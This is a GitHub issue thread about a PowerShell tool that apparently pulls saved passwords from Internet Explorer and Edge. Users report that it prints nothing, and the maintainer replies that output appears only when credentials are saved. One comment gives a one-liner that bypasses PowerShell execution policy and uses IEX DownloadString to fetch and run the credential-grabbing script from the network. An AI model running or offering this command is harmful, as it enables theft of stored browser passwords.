### ISSUE TITLE
No output from the script

### ISSUE THREAD

**Issue by carlnykvist** [HanseSecure/credgrap_ie_edge#4]
When I try to run it both as low-privileged user and as administrator, I get no output:
![image](https://user-images.githubusercontent.com/5971228/130942666-191456b2-5d6c-4189-bc84-b42580655442.png)

In this case, I logged in on Twitter and choose "Save password" after logging in.

Running the latest Edge version 
![image](https://user-images.githubusercontent.com/5971228/130942800-b914f2a2-569d-4bb0-ba2c-ecfeaa7ce25b.png)

**Comment by alexxroche** [comment]
Probably because http://bit.ly/2K75g15 currently says:
```txt
Warning: This URL has been blocked by Bitly's systems as potentially harmful.
We recommend you close your browser window and notify the person who sent you the link.
```
I haven't tested it but this might work:

```shell
powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/HanseSecure/credgrap_ie_edge/master/credgrap_ie_edge.ps1')"
```

**Comment by frank-da-tank** [comment]
I tried running the source code locally in ISE and it didn't output anything either.

**Comment by HanseSecure** [comment]
There is no output if you dont have any creds saved within your browser ;-)
